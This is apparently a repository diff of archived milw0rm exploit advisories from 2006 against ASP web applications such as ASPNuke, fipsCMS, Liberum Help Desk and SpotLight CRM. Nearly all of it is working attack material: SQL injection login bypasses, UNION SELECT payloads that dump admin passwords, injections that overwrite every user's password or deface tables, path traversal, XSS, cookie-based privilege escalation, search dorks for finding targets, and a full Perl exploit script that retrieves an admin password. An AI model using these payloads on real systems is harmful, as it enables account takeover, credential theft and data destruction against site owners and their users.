Next Click "Profile"
#ajann,Turkey
#...
#Im Not Hacker!
-->
# milw0rm.com [2006-11-13]

View file

@ -1,19 +1,19 @@
*******************************************************************************
# Title : Property Pro v1.0 (vir_Login.asp) Remote Login ByPass SQL Injection Vulnerability
# Author : ajann
*******************************************************************************
Example:
###http://[target]/[path]/admin/
UserName: ' union select 0,0 from admin
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-13]
*******************************************************************************
# Title : Property Pro v1.0 (vir_Login.asp) Remote Login ByPass SQL Injection Vulnerability
# Author : ajann
*******************************************************************************
Example:
###http://[target]/[path]/admin/
UserName: ' union select 0,0 from admin
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-13]

View file

@ -1,19 +1,19 @@
*******************************************************************************
# Title : ASP Smiley v1.0 (default.asp) Remote Login ByPass SQL Injection Vulnerability
# Author : ajann
*******************************************************************************
Example:
###http://[target]/[path]/admin/
UserName: ' union select 0,0,0,0,0,0,0,0 from categories
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-14]
*******************************************************************************
# Title : ASP Smiley v1.0 (default.asp) Remote Login ByPass SQL Injection Vulnerability
# Author : ajann
*******************************************************************************
Example:
###http://[target]/[path]/admin/
UserName: ' union select 0,0,0,0,0,0,0,0 from categories
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-14]

View file

@ -1,20 +1,20 @@
*******************************************************************************
# Title : NetVios <= 2.0 [News Application] (page.asp) Remote SQL Injection Vulnerability
# Author : ajann
*******************************************************************************
###http://[target]/[path]//page.asp?NewsID=[SQL]
Example:
//page.asp?NewsID=-1%20union%20select%200,0,0,logins,password,0,0,0%20from%20users%20where%20userid%20like%201
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-14]
*******************************************************************************
# Title : NetVios <= 2.0 [News Application] (page.asp) Remote SQL Injection Vulnerability
# Author : ajann
*******************************************************************************
###http://[target]/[path]//page.asp?NewsID=[SQL]
Example:
//page.asp?NewsID=-1%20union%20select%200,0,0,logins,password,0,0,0%20from%20users%20where%20userid%20like%201
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-14]

View file

@ -1,24 +1,24 @@
blogme v3 [admin login bypass & xss (post)]
vendor site:http://www.drumster.net/
product:blogme v3
bug:login bypass & xss (post)
risk:high
admin login bypass :
user : ' or '1' = '1
passwd: 1'='1' ro '
xss post :
in: /comments.asp?blog=85
vulnerables fields:
- Name
- URL
- Comments
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@gmail.com
# milw0rm.com [2006-11-14]
blogme v3 [admin login bypass & xss (post)]
vendor site:http://www.drumster.net/
product:blogme v3
bug:login bypass & xss (post)
risk:high
admin login bypass :
user : ' or '1' = '1
passwd: 1'='1' ro '
xss post :
in: /comments.asp?blog=85
vulnerables fields:
- Name
- URL
- Comments
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@gmail.com
# milw0rm.com [2006-11-14]

View file

@ -1,22 +1,22 @@
vendor site:http://hpe.net/
product:hpecs shopping cart
bug:injection sql
risk:high
login bypass :
username: 'or''='
passwd: 'or''='
injection sql (post) :
http://site.com/search_list.asp
variables:
Hpecs_Find=maingroup&searchstring='[sql]
( or just post your query in the search engine ... )
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@gmail.com
# milw0rm.com [2006-11-14]
vendor site:http://hpe.net/
product:hpecs shopping cart
bug:injection sql
risk:high
login bypass :
username: 'or''='
passwd: 'or''='
injection sql (post) :
http://site.com/search_list.asp
variables:
Hpecs_Find=maingroup&searchstring='[sql]
( or just post your query in the search engine ... )
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@gmail.com
# milw0rm.com [2006-11-14]

View file

@ -1,57 +1,57 @@
*******************************************************************************
# Title : ASPNuke <= 0.80 (register.asp) Remote SQL Injection Vulnerability
# Author : ajann
# S.Page : http://www.aspnuke.com
# D.Page : http://sourceforge.net/project/showfiles.php?group_id=92470
*******************************************************************************
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
ASP Nuke
Kenneth W. Richards
Orvado Technologies
-Introduction-
ASP Nuke is an open-source software application for running a
community-based web site on a web server.
By open-source, we mean the code is freely available for others to read,
modify and use in accordance
with the software license.
ASP Nuke is an extensible framework that allows you to upgrade and add
applications to the website quickly
and easily. It uses a modular architecture allowing others to rapidly
develop new modules and site operators
to re-organize the layout and navigation for their site.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Vulnerability::
_________________
###http://[target]/[path]//module/account/register/register.asp?StateCode=[SQL]&..&..&..&..&..&..&..&..&....
Example = Poll Update
///module/account/register/register.asp?StateCode=0',0,0,0,0,0);update%20tblPoll%20set%20Question%20=%20'hacked'--&FirstName=namename1&LastName=namename2&Username=abcdefghijk&Password=1234567890&Confirm=1234567890&Address1=kro.mahallesi&Address2=kro.apt&City=aaaaaaaaa&ZipCode=101010101&CountryID=0&Email=mailmail@mailbidaamail.com&Action=ADD&_dummy=Register
Note: Change UserName because ; failed:already username dont write.
Some tables,columns
___________________
[tblMember] | [FaqQuestion]
MemberID | QuestionID
Username | DocumentID
Password | Question
Firstname | Answer
Middlename | Active
EmailAddress | OrderNo
.. | ..
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-19]
*******************************************************************************
# Title : ASPNuke <= 0.80 (register.asp) Remote SQL Injection Vulnerability
# Author : ajann
# S.Page : http://www.aspnuke.com
# D.Page : http://sourceforge.net/project/showfiles.php?group_id=92470
*******************************************************************************
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
ASP Nuke
Kenneth W. Richards
Orvado Technologies
-Introduction-
ASP Nuke is an open-source software application for running a
community-based web site on a web server.
By open-source, we mean the code is freely available for others to read,
modify and use in accordance
with the software license.
ASP Nuke is an extensible framework that allows you to upgrade and add
applications to the website quickly
and easily. It uses a modular architecture allowing others to rapidly
develop new modules and site operators
to re-organize the layout and navigation for their site.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Vulnerability::
_________________
###http://[target]/[path]//module/account/register/register.asp?StateCode=[SQL]&..&..&..&..&..&..&..&..&....
Example = Poll Update
///module/account/register/register.asp?StateCode=0',0,0,0,0,0);update%20tblPoll%20set%20Question%20=%20'hacked'--&FirstName=namename1&LastName=namename2&Username=abcdefghijk&Password=1234567890&Confirm=1234567890&Address1=kro.mahallesi&Address2=kro.apt&City=aaaaaaaaa&ZipCode=101010101&CountryID=0&Email=mailmail@mailbidaamail.com&Action=ADD&_dummy=Register
Note: Change UserName because ; failed:already username dont write.
Some tables,columns
___________________
[tblMember] | [FaqQuestion]
MemberID | QuestionID
Username | DocumentID
Password | Question
Firstname | Answer
Middlename | Active
EmailAddress | OrderNo
.. | ..
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-19]

View file

@ -1,58 +1,58 @@
#!/usr/bin/perl
#[Script Name: fipsCMS <= v4.5 (index.asp) Remote SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
use IO::Socket;
if(@ARGV < 3){
print "
[========================================================================
[// fipsCMS <= v4.5 (index.asp) Remote SQL Injection Exploit
[// Usage: exploit.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$dir = $ARGV[1];
$file = "index.asp?lg=1&w=forumshow&fcat=-1&fansweres=True&froot=1&fid=";
$target = "-1%20union%20select%200,0,0,0,0,adminpword,0,0,0,0,0,0%20from%20admin%20where%20adminid%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /\"150\" value=\"Re:(.*?)class=\"/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Password: $1\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
# milw0rm.com [2006-11-22]
#!/usr/bin/perl
#[Script Name: fipsCMS <= v4.5 (index.asp) Remote SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
use IO::Socket;
if(@ARGV < 3){
print "
[========================================================================
[// fipsCMS <= v4.5 (index.asp) Remote SQL Injection Exploit
[// Usage: exploit.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$dir = $ARGV[1];
$file = "index.asp?lg=1&w=forumshow&fcat=-1&fansweres=True&froot=1&fid=";
$target = "-1%20union%20select%200,0,0,0,0,adminpword,0,0,0,0,0,0%20from%20admin%20where%20adminid%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /\"150\" value=\"Re:(.*?)class=\"/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Password: $1\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
# milw0rm.com [2006-11-22]

View file

@ -1,24 +1,24 @@
*******************************************************************************
# Title : fipsGallery <= v1.5 (index1.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# $$$ : 29 Euro
*******************************************************************************
###http://[target]/[path]//index1.asp?what=artists&which=[SQL]
Example:
//index1.asp?what=artists&which=-1%20union%20select%200,username,password%20from%20admin
See you Admin Hash..
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-22]
*******************************************************************************
# Title : fipsGallery <= v1.5 (index1.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# $$$ : 29 Euro
*******************************************************************************
###http://[target]/[path]//index1.asp?what=artists&which=[SQL]
Example:
//index1.asp?what=artists&which=-1%20union%20select%200,username,password%20from%20admin
See you Admin Hash..
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-22]

View file

@ -1,22 +1,22 @@
*******************************************************************************
# Title : fipsForum <= v2.6 (default2.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
*******************************************************************************
###http://[target]/[path]//default2.asp?kat=[SQL]
Example:
//default2.asp?kat=-1%20union%20select%200,pw_admin%20from%20config
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-22]
*******************************************************************************
# Title : fipsForum <= v2.6 (default2.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
*******************************************************************************
###http://[target]/[path]//default2.asp?kat=[SQL]
Example:
//default2.asp?kat=-1%20union%20select%200,pw_admin%20from%20config
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-22]

View file

@ -1,23 +1,23 @@
*******************************************************************************
# Title : Liberum Help Desk <= 0.97.3 (details.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# Dork : "Liberum Help Desk, Copyright (C) 2001 Doug Luxem. Please view the license
*******************************************************************************
###http://[target]/[path]//details.asp?id=[SQL]
Example:
//details.asp?id=2)%20update%20tblusers%20set%20password='kro'--
=> All Password Changed to "kro"
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-25]
*******************************************************************************
# Title : Liberum Help Desk <= 0.97.3 (details.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# Dork : "Liberum Help Desk, Copyright (C) 2001 Doug Luxem. Please view the license
*******************************************************************************
###http://[target]/[path]//details.asp?id=[SQL]
Example:
//details.asp?id=2)%20update%20tblusers%20set%20password='kro'--
=> All Password Changed to "kro"
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-25]

View file

@ -1,12 +1,12 @@
# Title : basicforum v 1.1 (edit.asp) Remote SQL Injection Vulnerability
# Author : bolivar
# Dork : "This script created by www.script.canavari.com"
---------------------------------------------------------------------------
http://[target]/[path]/edit.asp?type=message&id=-1+union+select+kullanici,sifre+from+uyeler
---------------------------------------------------------------------------
# Just for Fun!!
# milw0rm.com [2006-11-25]
# Title : basicforum v 1.1 (edit.asp) Remote SQL Injection Vulnerability
# Author : bolivar
# Dork : "This script created by www.script.canavari.com"
---------------------------------------------------------------------------
http://[target]/[path]/edit.asp?type=message&id=-1+union+select+kullanici,sifre+from+uyeler
---------------------------------------------------------------------------
# Just for Fun!!
# milw0rm.com [2006-11-25]

View file

@ -1,32 +1,32 @@
**************************************************************************************************
# Title : ASP-Nuke Community <= v1.5 Cookie Modification Privilege Escalation Vulnerability
# Author : ajann
# S.Page : http://www.rot.dk
# D.Page : http://www.rot.dk/aspnuke/downloads.asp
# Greetz : Nukedx
**************************************************************************************************
Cookie
----------
Open the Cookie Editor=>
Find cookie informations.
Change Informations=
Cookie Informations:
ASPNUKE14%5Fpseudoname , pseudoname => "Welcome *USERNAME*" see for
ASPNUKE14%5Fpseudo , pseudo => Login UserName
ASPNUKE14%5Fpseudoid , pseudoid => UserId
ASPNUKE14%5Femail , email => User Email
Save and go to default.asp.
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-25]
**************************************************************************************************
# Title : ASP-Nuke Community <= v1.5 Cookie Modification Privilege Escalation Vulnerability
# Author : ajann
# S.Page : http://www.rot.dk
# D.Page : http://www.rot.dk/aspnuke/downloads.asp
# Greetz : Nukedx
**************************************************************************************************
Cookie
----------
Open the Cookie Editor=>
Find cookie informations.
Change Informations=
Cookie Informations:
ASPNUKE14%5Fpseudoname , pseudoname => "Welcome *USERNAME*" see for
ASPNUKE14%5Fpseudo , pseudo => Login UserName
ASPNUKE14%5Fpseudoid , pseudoid => UserId
ASPNUKE14%5Femail , email => User Email
Save and go to default.asp.
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-25]

View file

@ -1,12 +1,12 @@
# Title : simpleblog <= v 2.3 (/admin/edit.asp) Remote SQL Injection Vulnerability
# Author : bolivar
# Dork : "SimpleBlog 2.3 by 8pixel.net"
---------------------------------------------------------------------------
http://[target]/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users
---------------------------------------------------------------------------
# Just for Fun!!
# milw0rm.com [2006-11-26]
# Title : simpleblog <= v 2.3 (/admin/edit.asp) Remote SQL Injection Vulnerability
# Author : bolivar
# Dork : "SimpleBlog 2.3 by 8pixel.net"
---------------------------------------------------------------------------
http://[target]/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users
---------------------------------------------------------------------------
# Just for Fun!!
# milw0rm.com [2006-11-26]

View file

@ -1,39 +1,39 @@
*******************************************************************************
# Title : Ultimate HelpDesk All Version (Source/XSS) Vulnerabilities
# Author : ajann
# Contact : :(
*******************************************************************************
Login Before Vulnerabilities.:
[[SOURCE]]]------------------------------------------------------
http://[target]/[path]//getfile.asp?filename=[SQL]
Example:
//getfile.asp?filename=../index.asp
//getfile.asp?filename=../../../boot.ini
[[/SOURCE]]]
[[XSS]]]---------------------------------------------------------
http://[target]/[path]//index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_field=&intpage=2&keyword=[XSS]
Example:
//index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_field=&intpage=2&keyword=%22%3E%3Cscript%3Ealert%28%27ajann%27%29%3B%3C%2Fscript%3E
[[/XSS]]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-12-01]
*******************************************************************************
# Title : Ultimate HelpDesk All Version (Source/XSS) Vulnerabilities
# Author : ajann
# Contact : :(
*******************************************************************************
Login Before Vulnerabilities.:
[[SOURCE]]]------------------------------------------------------
http://[target]/[path]//getfile.asp?filename=[SQL]
Example:
//getfile.asp?filename=../index.asp
//getfile.asp?filename=../../../boot.ini
[[/SOURCE]]]
[[XSS]]]---------------------------------------------------------
http://[target]/[path]//index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_field=&intpage=2&keyword=[XSS]
Example:
//index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_field=&intpage=2&keyword=%22%3E%3Cscript%3Ealert%28%27ajann%27%29%3B%3C%2Fscript%3E
[[/XSS]]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-12-01]

View file

@ -1,28 +1,28 @@
*************************************************************************************
# Title : SpotLight CRM 1.0 (login.asp) | Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# $$$ : $2,499
*************************************************************************************
[[SQL]]]
###http://[target]/[path]//login.asp=[POST SQL]
Example:
-> All User UserName And Password Changed "kro"
// login.asp UserName: ';update login set password='kro'--
// login.asp UserName: ';update login set loginName='kro'--
[[/SQL]]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-12-09]
*************************************************************************************
# Title : SpotLight CRM 1.0 (login.asp) | Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# $$$ : $2,499
*************************************************************************************
[[SQL]]]
###http://[target]/[path]//login.asp=[POST SQL]
Example:
-> All User UserName And Password Changed "kro"
// login.asp UserName: ';update login set password='kro'--
// login.asp UserName: ';update login set loginName='kro'--
[[/SQL]]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-12-09]

View file

@ -1,30 +1,30 @@
*************************************************************************************
# Title : Request For Travel 1.0 (product) | Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# $$$ : $8,000
*************************************************************************************
[[SQL]]]
###http://[target]/[path]//ProductDetails.asp=[SQL]
Example:
-> All News Title Changed to = "kro"
//ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'--
-> Just NewsId Title Changed to = "kro"
//ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'%20where%20NewsID=2--
[[/SQL]]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-12-09]
*************************************************************************************
# Title : Request For Travel 1.0 (product) | Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# $$$ : $8,000
*************************************************************************************
[[SQL]]]
###http://[target]/[path]//ProductDetails.asp=[SQL]
Example:
-> All News Title Changed to = "kro"
//ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'--
-> Just NewsId Title Changed to = "kro"
//ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'%20where%20NewsID=2--
[[/SQL]]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-12-09]

Some files were not shown because too many files have changed in this diff Show more